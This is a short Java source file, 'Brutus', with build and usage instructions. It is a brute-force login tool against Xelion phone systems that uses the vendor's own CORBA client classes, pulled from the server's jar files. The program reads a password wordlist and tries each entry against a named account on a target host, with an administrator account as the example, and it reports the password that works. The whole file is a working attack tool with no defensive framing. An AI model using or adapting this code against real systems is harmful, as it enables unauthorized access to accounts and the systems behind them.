Brutus - Brute-force login on a Xelion system using their own classes.

Brutus.java

/*
- Get the .jar files from the server (check .jnlp file).
- Extract those .jar files (unzip).
- Place Brutus.java in the same directory.
- Compile using the JDK: "c:\Program Files\Java\jdk-16\bin\javac.exe" -target 1.7 -source 1.7 Brutus.java
- Notice the target & source. Otherwise CORBA can't be found.

- Run: java Brutus <accountname> <ascii password file> <target>
- Example: java Brutus beheerder passwords.txt xelion.local
*/

import java.io.*;
import nl.xelion.xcc.csi.corba.CorbaConnection;

class Brutus {
	public static void main(String[] args) {
		String username = args[0];
		String passwordfile = args[1];
		String hostname = args[2];
		System.out.println("Starting");

		try {
			File file = new File(passwordfile);
			FileReader fr = new FileReader(file);
			BufferedReader br = new BufferedReader(fr);
			String password;

			Boolean found = false;
			while (((password = br.readLine()) != null) && found == false) {
				try {
					CorbaConnection connection = new CorbaConnection();
					connection.connect(username, password.toCharArray(), "", hostname, null, true);

					// No exception? We must have found the password.
					System.out.println("Correct password: " + password);
					found = true;
					break;

				}
				catch (Exception e) {
					// e.printStackTrace(System.out);
					System.out.println("Wrong password: " + password);
				}
			}
		}
		catch (Exception e) {
				e.printStackTrace(System.out);
		}
		System.out.println("Finished");
	}
}